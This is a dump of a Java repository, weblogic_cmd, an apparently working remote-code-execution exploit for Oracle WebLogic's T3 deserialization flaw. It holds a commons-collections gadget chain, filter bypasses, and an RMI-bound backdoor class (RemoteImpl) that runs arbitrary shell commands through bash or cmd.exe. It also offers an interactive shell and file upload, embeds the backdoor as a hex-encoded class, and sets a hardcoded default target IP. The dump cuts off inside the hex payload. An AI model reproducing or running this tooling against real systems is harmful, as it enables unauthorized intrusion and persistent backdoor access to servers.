Repository: 5up3rc/weblogic_cmd
Branch: master
Commit: 2b78744a3c7b
Files: 39
Total size: 55.8 MB
Directory structure:
gitextract_xf0mq9cb/
├── .idea/
│ ├── artifacts/
│ │ └── weblogic_cmd_jar.xml
│ ├── description.html
│ ├── excludeFromValidation.xml
│ ├── libraries/
│ │ ├── commons_cli_1_4.xml
│ │ ├── commons_collections_3_1.xml
│ │ ├── jsafeFIPS.xml
│ │ ├── wlcipher.xml
│ │ └── wlfullclient.xml
│ ├── misc.xml
│ ├── modules.xml
│ ├── project-template.xml
│ └── uiDesigner.xml
├── README.md
├── lib/
│ ├── commons-cli-1.4.jar
│ ├── commons-collections-3.1.jar
│ ├── jsafeFIPS.jar
│ ├── wlcipher.jar
│ └── wlfullclient.jar
├── src/
│ ├── META-INF/
│ │ └── MANIFEST.MF
│ ├── com/
│ │ └── supeream/
│ │ ├── Main.java
│ │ ├── payload/
│ │ │ ├── PayloadTest.java
│ │ │ └── RemoteImpl.java
│ │ ├── serial/
│ │ │ ├── BytesOperation.java
│ │ │ ├── Reflections.java
│ │ │ ├── SerialDataGenerator.java
│ │ │ └── Serializables.java
│ │ ├── ssl/
│ │ │ ├── SocketFactory.java
│ │ │ ├── TrustManagerImpl.java
│ │ │ └── WeblogicTrustManager.java
│ │ └── weblogic/
│ │ ├── BypassPayloadSelector.java
│ │ ├── ObjectTest.java
│ │ ├── T3ProtocolOperation.java
│ │ ├── T3Test.java
│ │ └── WebLogicOperation.java
│ └── weblogic/
│ ├── jms/
│ │ └── common/
│ │ └── StreamMessageImpl.java
│ ├── security/
│ │ └── utils/
│ │ ├── SSLSetup.java
│ │ └── SSLTrustValidator.java
│ └── socket/
│ └── ChannelSSLSocketFactory.java
└── weblogic_cmd.iml
================================================
FILE CONTENTS
================================================
================================================
FILE: .idea/artifacts/weblogic_cmd_jar.xml
================================================
<component name="ArtifactManager">
<artifact type="jar" name="weblogic_cmd:jar">
<output-path>$PROJECT_DIR$/out/artifacts/weblogic_cmd_jar</output-path>
<root id="archive" name="weblogic_cmd.jar">
<element id="module-output" name="weblogic_cmd" />
<element id="extracted-dir" path="$PROJECT_DIR$/lib/commons-collections-3.1.jar" path-in-jar="/" />
<element id="extracted-dir" path="$PROJECT_DIR$/lib/wlfullclient.jar" path-in-jar="/" />
<element id="extracted-dir" path="$PROJECT_DIR$/lib/jsafeFIPS.jar" path-in-jar="/" />
<element id="extracted-dir" path="$PROJECT_DIR$/lib/remote.jar" path-in-jar="/" />
<element id="extracted-dir" path="$PROJECT_DIR$/lib/wlcipher.jar" path-in-jar="/" />
<element id="extracted-dir" path="$PROJECT_DIR$/lib/commons-cli-1.4.jar" path-in-jar="/" />
</root>
</artifact>
</component>
================================================
FILE: .idea/description.html
================================================
<html>Simple <b>Java</b> application that includes a class with <code>main()</code> method</html>
================================================
FILE: .idea/excludeFromValidation.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ExcludeFromValidation">
<file url="file://$PROJECT_DIR$/src/weblogic/jms/common/StreamMessageImpl.java" />
</component>
</project>
================================================
FILE: .idea/libraries/commons_cli_1_4.xml
================================================
<component name="libraryTable">
<library name="commons-cli-1.4">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/commons-cli-1.4.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component>
================================================
FILE: .idea/libraries/commons_collections_3_1.xml
================================================
<component name="libraryTable">
<library name="commons-collections-3.1">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/commons-collections-3.1.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component>
================================================
FILE: .idea/libraries/jsafeFIPS.xml
================================================
<component name="libraryTable">
<library name="jsafeFIPS">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/jsafeFIPS.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component>
================================================
FILE: .idea/libraries/wlcipher.xml
================================================
<component name="libraryTable">
<library name="wlcipher">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/wlcipher.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES />
</library>
</component>
================================================
FILE: .idea/libraries/wlfullclient.xml
================================================
<component name="libraryTable">
<library name="wlfullclient">
<CLASSES>
<root url="jar://$PROJECT_DIR$/lib/wlfullclient.jar!/" />
</CLASSES>
<JAVADOC />
<SOURCES>
<root url="jar://$PROJECT_DIR$/lib/wlfullclient.jar!/" />
</SOURCES>
</library>
</component>
================================================
FILE: .idea/misc.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectKey">
<option name="state" value="project://e2804f05-5315-4fc6-a121-c522a6c26470" />
</component>
<component name="ProjectRootManager" version="2" languageLevel="JDK_1_6" default="false" project-jdk-name="1.6" project-jdk-type="JavaSDK">
<output url="file://$PROJECT_DIR$/out" />
</component>
</project>
================================================
FILE: .idea/modules.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="ProjectModuleManager">
<modules>
<module fileurl="file://$PROJECT_DIR$/weblogic_cmd.iml" filepath="$PROJECT_DIR$/weblogic_cmd.iml" />
</modules>
</component>
</project>
================================================
FILE: .idea/project-template.xml
================================================
<template>
<input-field default="com.company">IJ_BASE_PACKAGE</input-field>
</template>
================================================
FILE: .idea/uiDesigner.xml
================================================
<?xml version="1.0" encoding="UTF-8"?>
<project version="4">
<component name="Palette2">
<group name="Swing">
<item class="com.intellij.uiDesigner.HSpacer" tooltip-text="Horizontal Spacer" icon="/com/intellij/uiDesigner/icons/hspacer.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="1" hsize-policy="6" anchor="0" fill="1" />
</item>
<item class="com.intellij.uiDesigner.VSpacer" tooltip-text="Vertical Spacer" icon="/com/intellij/uiDesigner/icons/vspacer.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="1" anchor="0" fill="2" />
</item>
<item class="javax.swing.JPanel" icon="/com/intellij/uiDesigner/icons/panel.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3" />
</item>
<item class="javax.swing.JScrollPane" icon="/com/intellij/uiDesigner/icons/scrollPane.png" removable="false" auto-create-binding="false" can-attach-label="true">
<default-constraints vsize-policy="7" hsize-policy="7" anchor="0" fill="3" />
</item>
<item class="javax.swing.JButton" icon="/com/intellij/uiDesigner/icons/button.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="0" fill="1" />
<initial-values>
<property name="text" value="Button" />
</initial-values>
</item>
<item class="javax.swing.JRadioButton" icon="/com/intellij/uiDesigner/icons/radioButton.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
<initial-values>
<property name="text" value="RadioButton" />
</initial-values>
</item>
<item class="javax.swing.JCheckBox" icon="/com/intellij/uiDesigner/icons/checkBox.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="3" anchor="8" fill="0" />
<initial-values>
<property name="text" value="CheckBox" />
</initial-values>
</item>
<item class="javax.swing.JLabel" icon="/com/intellij/uiDesigner/icons/label.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="0" anchor="8" fill="0" />
<initial-values>
<property name="text" value="Label" />
</initial-values>
</item>
<item class="javax.swing.JTextField" icon="/com/intellij/uiDesigner/icons/textField.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JPasswordField" icon="/com/intellij/uiDesigner/icons/passwordField.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JFormattedTextField" icon="/com/intellij/uiDesigner/icons/formattedTextField.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1">
<preferred-size width="150" height="-1" />
</default-constraints>
</item>
<item class="javax.swing.JTextArea" icon="/com/intellij/uiDesigner/icons/textArea.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTextPane" icon="/com/intellij/uiDesigner/icons/textPane.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JEditorPane" icon="/com/intellij/uiDesigner/icons/editorPane.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JComboBox" icon="/com/intellij/uiDesigner/icons/comboBox.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="2" anchor="8" fill="1" />
</item>
<item class="javax.swing.JTable" icon="/com/intellij/uiDesigner/icons/table.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JList" icon="/com/intellij/uiDesigner/icons/list.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="2" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTree" icon="/com/intellij/uiDesigner/icons/tree.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3">
<preferred-size width="150" height="50" />
</default-constraints>
</item>
<item class="javax.swing.JTabbedPane" icon="/com/intellij/uiDesigner/icons/tabbedPane.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
<preferred-size width="200" height="200" />
</default-constraints>
</item>
<item class="javax.swing.JSplitPane" icon="/com/intellij/uiDesigner/icons/splitPane.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="3" hsize-policy="3" anchor="0" fill="3">
<preferred-size width="200" height="200" />
</default-constraints>
</item>
<item class="javax.swing.JSpinner" icon="/com/intellij/uiDesigner/icons/spinner.png" removable="false" auto-create-binding="true" can-attach-label="true">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
</item>
<item class="javax.swing.JSlider" icon="/com/intellij/uiDesigner/icons/slider.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="8" fill="1" />
</item>
<item class="javax.swing.JSeparator" icon="/com/intellij/uiDesigner/icons/separator.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="6" anchor="0" fill="3" />
</item>
<item class="javax.swing.JProgressBar" icon="/com/intellij/uiDesigner/icons/progressbar.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1" />
</item>
<item class="javax.swing.JToolBar" icon="/com/intellij/uiDesigner/icons/toolbar.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="6" anchor="0" fill="1">
<preferred-size width="-1" height="20" />
</default-constraints>
</item>
<item class="javax.swing.JToolBar$Separator" icon="/com/intellij/uiDesigner/icons/toolbarSeparator.png" removable="false" auto-create-binding="false" can-attach-label="false">
<default-constraints vsize-policy="0" hsize-policy="0" anchor="0" fill="1" />
</item>
<item class="javax.swing.JScrollBar" icon="/com/intellij/uiDesigner/icons/scrollbar.png" removable="false" auto-create-binding="true" can-attach-label="false">
<default-constraints vsize-policy="6" hsize-policy="0" anchor="0" fill="2" />
</item>
</group>
</component>
</project>
================================================
FILE: README.md
================================================
# weblogic_cmd
weblogic t3 deserialization rce
1. 直接通过加载字节码的方式来加载class,执行无文件生成。通过绑定rmi来实现回显。
2. 支持t3s
3. 支持StreamMessageImpl,MarshalledObject绕过
使用说明:
-H 远程目标主机
-P 远程目标端口
-C 需要执行的命令
-T 可选的绕过方式
-U 删除绑定的rmi实例
-B 通过payload直接调用系统命令-针对没法回显的情况下使用
-os 指定目标操作系统
-https 使用tls的指定
-shell 以shell的方式展现
-upload 上传文件 需要配合-src -dst
-src 需要上传的文件路径
-dst 需要上传文件至目标的路径
-noExecPath 在某些没有/bin/bash 或者cmd.exe情况下使用
================================================
FILE: lib/wlfullclient.jar
================================================
[File too large to display: 55.6 MB]
================================================
FILE: src/META-INF/MANIFEST.MF
================================================
Manifest-Version: 1.0
Main-Class: com.supeream.Main
================================================
FILE: src/com/supeream/Main.java
================================================
package com.supeream;
import com.supeream.serial.BytesOperation;
import com.supeream.ssl.WeblogicTrustManager;
import com.supeream.weblogic.WebLogicOperation;
import org.apache.commons.cli.*;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.jndi.Environment;
import weblogic.utils.encoders.BASE64Encoder;
import javax.naming.Context;
import javax.naming.NamingException;
import java.io.FileNotFoundException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
import java.util.Scanner;
public class Main {
public static final String JNDI_FACTORY = "weblogic.jndi.WLInitialContextFactory";
public static String TYPE = "streamMessageImpl";
public static List<String> types = Arrays.asList(new String[]{"marshall", "collection", "streamMessageImpl"});
public static String version;
public static CommandLine cmdLine;
private static String cmd = "whoami";
public static Context getInitialContext(String url) throws NamingException, FileNotFoundException {
Environment environment = new Environment();
environment.setProviderUrl(url);
environment.setEnableServerAffinity(false);
environment.setSSLClientTrustManager(new WeblogicTrustManager());
return environment.getInitialContext();
}
public static boolean checkIsAlreadyInstalled(String host, String port) {
try {
System.out.println("检查是否安装rmi实例");
Context initialContext = getInitialContext(converUrl(host, port));
ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream");
System.out.println("rmi已经安装");
invokeRmi(remoteCode);
return true;
} catch (Exception e) {
if (e.getMessage() !=null && e.getMessage().contains("supeream")) {
System.out.println("rmi实例不存在");
} else {
e.printStackTrace();
// System.exit(0);
}
}
return false;
}
public static void executeBlind(String host, String port) throws Exception {
if (cmdLine.hasOption("B") && cmdLine.hasOption("C")) {
System.out.println("执行命令:" + cmdLine.getOptionValue("C"));
WebLogicOperation.blindExecute(host, port, cmdLine.getOptionValue("C"));
System.out.println("执行blind命令完成");
System.exit(0);
}
}
public static String converUrl(String host, String port) {
if (cmdLine.hasOption("https")) {
return "t3s://" + host + ":" + port;
} else {
return "t3://" + host + ":" + port;
}
}
private static String cdConcat(List<String> cds) {
StringBuffer stringBuffer = new StringBuffer();
for (String cd: cds) {
stringBuffer.append(cd);
stringBuffer.append("&&");
}
return stringBuffer.toString();
}
public static void invokeRmi(ClusterMasterRemote remoteCode) throws Exception {
String result = null;
if (Main.cmdLine.hasOption("shell")) {
Scanner scanner = new Scanner(System.in);
List<String> cacheCmds = new ArrayList<String>();
while (true) {
System.out.print("please input cmd:>");
cmd = scanner.nextLine();
if (cmd.equalsIgnoreCase("exit")) {
System.exit(0);
}
if (cmd.startsWith("cd ")) {
cacheCmds.add(cmd);
}
if (cmd.equalsIgnoreCase("clear")) {
cacheCmds.clear();
continue;
}
if (cmd.equalsIgnoreCase("back")) {
cacheCmds.remove(cacheCmds.size()-1);
continue;
}
String newCmd = cdConcat(cacheCmds);
if (!cmd.startsWith("cd ")) {
newCmd += cmd;
} else if (newCmd.length()>3){
newCmd = newCmd.substring(0, newCmd.length()-2);
}
if (Main.cmdLine.hasOption("noExecPath")) {
result = remoteCode.getServerLocation("showmecode$NO$"+newCmd);
} else {
result = remoteCode.getServerLocation("showmecode"+newCmd);
}
System.out.println(result);
}
} else {
System.out.println("执行命令:" + cmd);
if (Main.cmdLine.hasOption("noExecPath")) {
result = remoteCode.getServerLocation("showmecode$NO$"+cmd);
} else {
result = remoteCode.getServerLocation("showmecode"+cmd);
}
System.out.println(result);
}
}
public static void main(String[] args) {
System.setProperty("weblogic.security.allowCryptoJDefaultJCEVerification", "true");
System.setProperty("weblogic.security.allowCryptoJDefaultPRNG", "true");
System.setProperty("weblogic.security.SSL.ignoreHostnameVerification", "true");
System.setProperty("weblogic.security.TrustKeyStore", "DemoTrust");
Options options = new Options();
options.addOption("H", true, "Remote Host[need set]");
options.addOption("P", true, "Remote Port[need set]");
options.addOption("C", true, "Execute Command[need set]");
options.addOption("T", true, "Payload Type" + types);
options.addOption("U", false, "Uninstall rmi");
options.addOption("B", false, "Runtime Blind Execute Command maybe you should select os type");
options.addOption("os", true, "Os Type [windows,linux]");
options.addOption("https", false, "enable https or tls");
options.addOption("shell", false, "enable shell module");
options.addOption("upload", false, "enable upload a file");
options.addOption("src", true, "path to src file ");
options.addOption("dst", true, "path to dst file ");
options.addOption("noExecPath", false, "custom execute path");
try {
String host = "202.60.207.169";
String port = "7001";
CommandLineParser parser = new DefaultParser();
cmdLine = parser.parse(options, args);
if (cmdLine.hasOption("H")) {
host = cmdLine.getOptionValue("H");
} else {
HelpFormatter formatter = new HelpFormatter();
formatter.printHelp("supeream", options);
System.exit(0);
}
if (cmdLine.hasOption("P")) {
port = cmdLine.getOptionValue("P");
}
if (cmdLine.hasOption("C")) {
cmd = cmdLine.getOptionValue("C");
}
if (cmdLine.hasOption("T")) {
TYPE = cmdLine.getOptionValue("T");
}
if (cmdLine.hasOption("U")) {
System.out.println("开始删除rmi实例");
WebLogicOperation.unInstallRmi(host, port);
System.out.println("后门删除实例");
System.exit(0);
}
executeBlind(host, port);
if (Main.cmdLine.hasOption("upload") && Main.cmdLine.hasOption("src") && Main.cmdLine.hasOption("dst")) {
System.out.println("开始上传文件");
String path = Main.cmdLine.getOptionValue("src");
byte[] fileContent = BytesOperation.GetByteByFile(path);
WebLogicOperation.uploadFile(host, port, Main.cmdLine.getOptionValue("dst"), fileContent);
System.out.println("file upload success");
System.exit(0);
}
if (checkIsAlreadyInstalled(host, port)) {
System.exit(0);
}
System.out.println("开始安装rmi实例");
WebLogicOperation.installRmi(host, port);
System.out.println("等待rmi实例安装成功 ");
Thread.sleep(2000);
Context initialContext = getInitialContext(converUrl(host, port));
ClusterMasterRemote remoteCode = (ClusterMasterRemote) initialContext.lookup("supeream");
invokeRmi(remoteCode);
} catch (Exception e) {
System.out.println("实例安装失败");
String msg = e.getMessage();
if (msg != null && msg.contains("Unrecognized option")) {
HelpFormatter formatter = new HelpFormatter();
formatter.printHelp("supeream", options);
} else {
System.out.println("实例rmi安装失败 请切换-OB模式");
e.printStackTrace();
}
}
}
}
================================================
FILE: src/com/supeream/payload/PayloadTest.java
================================================
package com.supeream.payload;
import com.supeream.serial.BytesOperation;
import sun.org.mozilla.javascript.internal.DefiningClassLoader;
/**
* Created by nike on 17/7/3.
*/
public class PayloadTest {
public static void main(String[] args) throws Exception {
// byte[] iRemoteCode = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/IRemote.class");
// System.out.println(BytesOperation.bytesToHexString(iRemoteCode));
DefiningClassLoader definingClassLoader = new DefiningClassLoader();
// Class<?> cls = definingClassLoader.defineClass("com.supeream.payload.IRemote",iRemoteCode);
byte[] remoteCodeImpl = BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/out/production/weblogic_cmd/com/supeream/payload/RemoteImpl.class");
System.out.println(BytesOperation.bytesToHexString(remoteCodeImpl));
Class<?> cls_ = definingClassLoader.defineClass("com.supeream.payload.RemoteImpl", remoteCodeImpl);
Class.forName("com.supeream.payload.RemoteImpl");
System.out.println(cls_);
}
}
================================================
FILE: src/com/supeream/payload/RemoteImpl.java
================================================
package com.supeream.payload;
import sun.tools.asm.TryData;
import weblogic.cluster.singleton.ClusterMasterRemote;
import weblogic.utils.encoders.BASE64Decoder;
import javax.naming.Context;
import javax.naming.InitialContext;
import java.io.BufferedReader;
import java.io.FileOutputStream;
import java.io.InputStreamReader;
import java.rmi.RemoteException;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.List;
/**
* Created by nike on 17/6/27.
*/
public class RemoteImpl implements ClusterMasterRemote {
public static void main(String[] args) {
try {
RemoteImpl remote = new RemoteImpl();
if (args.length == 2 && args[0].equalsIgnoreCase("blind")) {
remote.getServerLocation(args[1]);
} else if (args.length == 1) {
Context ctx = new InitialContext();
if (args[0].equalsIgnoreCase("install")) {
ctx.rebind("supeream", remote);
} else if (args[0].equalsIgnoreCase("uninstall")) {
ctx.unbind("supeream");
}
}
} catch (Exception e) {
}
}
@Override
public void setServerLocation(String cmd, String args) throws RemoteException {
}
public static void uploadFile(String path, byte[] content) {
try {
FileOutputStream fileOutputStream = new FileOutputStream(path);
fileOutputStream.write(content);
fileOutputStream.flush();
fileOutputStream.close();
}catch (Exception e) {
}
}
@Override
public String getServerLocation(String cmd) throws RemoteException {
try {
if (!cmd.startsWith("showmecode")) {
return "guess me?";
} else {
cmd = cmd.substring(10);
}
boolean isLinux = true;
String osTyp = System.getProperty("os.name");
if (osTyp != null && osTyp.toLowerCase().contains("win")) {
isLinux = false;
}
List<String> cmds = new ArrayList<String>();
if (cmd.startsWith("$NO$")) {
cmds.add(cmd.substring(4));
}else if (isLinux) {
cmds.add("/bin/bash");
cmds.add("-c");
cmds.add(cmd);
} else {
cmds.add("cmd.exe");
cmds.add("/c");
cmds.add(cmd);
}
ProcessBuilder processBuilder = new ProcessBuilder(cmds);
processBuilder.redirectErrorStream(true);
Process proc = processBuilder.start();
BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
StringBuffer sb = new StringBuffer();
String line;
while ((line = br.readLine()) != null) {
sb.append(line).append("\n");
}
return sb.toString();
} catch (Exception e) {
return e.getMessage();
}
}
}
================================================
FILE: src/com/supeream/serial/BytesOperation.java
================================================
package com.supeream.serial;
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by Fernflower decompiler)
//
import java.io.FileInputStream;
public class BytesOperation {
public static byte[] hexStringToBytes(String hexString) {
if (hexString != null && !hexString.equals("")) {
hexString = hexString.toUpperCase();
int length = hexString.length() / 2;
char[] hexChars = hexString.toCharArray();
byte[] d = new byte[length];
for (int i = 0; i < length; ++i) {
int pos = i * 2;
d[i] = (byte) (charToByte(hexChars[pos]) << 4 | charToByte(hexChars[pos + 1]));
}
return d;
} else {
return null;
}
}
private static byte charToByte(char c) {
return (byte) "0123456789ABCDEF".indexOf(c);
}
public static byte[] byteMerger(byte[] byte_1, byte[] byte_2) {
byte[] byte_3 = new byte[byte_1.length + byte_2.length];
System.arraycopy(byte_1, 0, byte_3, 0, byte_1.length);
System.arraycopy(byte_2, 0, byte_3, byte_1.length, byte_2.length);
return byte_3;
}
public static String bytesToHexString(byte[] src) {
StringBuilder stringBuilder = new StringBuilder("");
if (src == null || src.length <= 0) {
return null;
}
for (int i = 0; i < src.length; i++) {
int v = src[i] & 0xFF;
String hv = Integer.toHexString(v);
if (hv.length() < 2) {
stringBuilder.append(0);
}
stringBuilder.append(hv);
}
return stringBuilder.toString();
}
public static byte[] GetByteByFile(String FilePath) throws Exception {
FileInputStream fi = new FileInputStream(FilePath);
byte[] temp = new byte[50000000];
int length = fi.read(temp);
byte[] file = new byte[length];
for (int i = 0; i < length; ++i) {
file[i] = temp[i];
}
fi.close();
return file;
}
public static void main(String[] args) throws Exception {
System.out.println(BytesOperation.bytesToHexString(BytesOperation.GetByteByFile("/Users/nike/IdeaProjects/weblogic_cmd/lib/remote.jar")));
}
}
================================================
FILE: src/com/supeream/serial/Reflections.java
================================================
package com.supeream.serial;
import java.lang.reflect.Constructor;
import java.lang.reflect.Field;
public class Reflections {
public static Field getField(final Class<?> clazz, final String fieldName) throws Exception {
Field field = clazz.getDeclaredField(fieldName);
if (field == null && clazz.getSuperclass() != null) {
field = getField(clazz.getSuperclass(), fieldName);
}
field.setAccessible(true);
return field;
}
public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
field.set(obj, value);
}
public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
final Field field = getField(obj.getClass(), fieldName);
return field.get(obj);
}
public static Constructor<?> getFirstCtor(final String name) throws Exception {
final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
ctor.setAccessible(true);
return ctor;
}
}
================================================
FILE: src/com/supeream/serial/SerialDataGenerator.java
================================================
package com.supeream.serial;
import com.supeream.weblogic.BypassPayloadSelector;
import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.LazyMap;
import org.mozilla.classfile.DefiningClassLoader;
import java.lang.reflect.InvocationHandler;
import java.lang.reflect.Proxy;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
/**
* Created by nike on 17/7/3.
*/
public class SerialDataGenerator {
private static final String REMOTE = "com.supeream.payload.RemoteImpl";
private static final String remoteHex = "cafebabe0000003200d10a003500720700730a000200720800740a007500760a000200770700780a0007007208007908007a0b007b007c08007d0b007b007e07007f0700800a000f00810a000f00820a000f00830a000f00840800850a007500860800870a007500880800890a008a008b0a0075008c08008d0a0075008e07008f0a001d00720800900b009100920800930800940800950800960700970a002500980a002500990a0025009a07009b07009c0a009d009e0a002a009f0a002900a00700a10a002e00720a002900a20a002e00a30800a40a002e00a50a000e00a60700a70700a80100063c696e69743e010003282956010004436f646501000f4c696e654e756d6265725461626c650100124c6f63616c5661726961626c655461626c65010004746869730100214c636f6d2f737570657265616d2f7061796c6f61642f52656d6f7465496d706c3b0100046d61696e010016285b4c6a6176612f6c616e672f537472696e673b29560100036374780100164c6a617661782f6e616d696e672f436f6e746578743b01000672656d6f7465010001650100154c6a6176612f6c616e672f457863657074696f6e3b010004617267730100135b4c6a6176612f6c616e672f537472696e673b01000d537461636b4d61705461626c650700730700a907007f0100117365745365727665724c6f636174696f6e010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f537472696e673b2956010003636d640100124c6a6176612f6c616e672f537472696e673b01000a457863657074696f6e730700aa01000a75706c6f616446696c65010017284c6a6176612f6c616e672f537472696e673b5b42295601001066696c654f757470757453747265616d01001a4c6a6176612f696f2f46696c654f757470757453747265616d3b01000470617468010007636f6e74656e740100025b420100116765745365727665724c6f636174696f6e010026284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f537472696e673b01000769734c696e75780100015a0100056f73547970010004636d64730100104c6a6176612f7574696c2f4c6973743b01000e70726f636573734275696c64657201001a4c6a6176612f6c616e672f50726f636573734275696c6465723b01000470726f630100134c6a6176612f6c616e672f50726f636573733b01000262720100184c6a6176612f696f2f42756666657265645265616465723b01000273620100184c6a6176612f6c616e672f537472696e674275666665723b0100046c696e650100164c6f63616c5661726961626c65547970655461626c650100244c6a6176612f7574696c2f4c6973743c4c6a6176612f6c616e672f537472696e673b3e3b0700ab0700ac0700970700ad07009b0700a101000a536f7572636546696c6501000f52656d6f7465496d706c2e6a6176610c0037003801001f636f6d2f737570657265616d2f7061796c6f61642f52656d6f7465496d706c010005626c696e640700ab0c00ae00af0c0058005901001b6a617661782f6e616d696e672f496e697469616c436f6e74657874010007696e7374616c6c010008737570657265616d0700a90c00b000b1010009756e696e7374616c6c0c00b200b30100136a6176612f6c616e672f457863657074696f6e0100186a6176612f696f2f46696c654f757470757453747265616d0c003700b30c00b400b50c00b600380c00b7003801000a73686f776d65636f64650c00b800af0100096775657373206d653f0c00b900ba0100076f732e6e616d650700bb0c00bc00590c00bd00be01000377696e0c00bf00c00100136a6176612f7574696c2f41727261794c697374010004244e4f240700ac0c00c100c20100092f62696e2f626173680100022d63010007636d642e6578650100022f630100186a6176612f6c616e672f50726f636573734275696c6465720c003700c30c00c400c50c00c600c70100166a6176612f696f2f42756666657265645265616465720100196a6176612f696f2f496e70757453747265616d5265616465720700ad0c00c800c90c003700ca0c003700cb0100166a6176612f6c616e672f537472696e674275666665720c00cc00be0c00cd00ce0100010a0c00cf00be0c00d000be0100106a6176612f6c616e672f4f626a65637401002e7765626c6f6769632f636c75737465722f73696e676c65746f6e2f436c75737465724d617374657252656d6f74650100146a617661782f6e616d696e672f436f6e746578740100186a6176612f726d692f52656d6f7465457863657074696f6e0100106a6176612f6c616e672f537472696e6701000e6a6176612f7574696c2f4c6973740100116a6176612f6c616e672f50726f63657373010010657175616c7349676e6f726543617365010015284c6a6176612f6c616e672f537472696e673b295a010006726562696e64010027284c6a6176612f6c616e672f537472696e673b4c6a6176612f6c616e672f4f626a6563743b2956010006756e62696e64010015284c6a6176612f6c616e672f537472696e673b29560100057772697465010005285b422956010005666c757368010005636c6f736501000a73746172747357697468010009737562737472696e670100152849294c6a6176612f6c616e672f537472696e673b0100106a6176612f6c616e672f53797374656d01000b67657450726f706572747901000b746f4c6f7765724361736501001428294c6a6176612f6c616e672f537472696e673b010008636f6e7461696e7301001b284c6a6176612f6c616e672f4368617253657175656e63653b295a010003616464010015284c6a6176612f6c616e672f4f626a6563743b295a010013284c6a6176612f7574696c2f4c6973743b295601001372656469726563744572726f7253747265616d01001d285a294c6a6176612f6c616e672f50726f636573734275696c6465723b010005737461727401001528294c6a6176612f6c616e672f50726f636573733b01000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b010018284c6a6176612f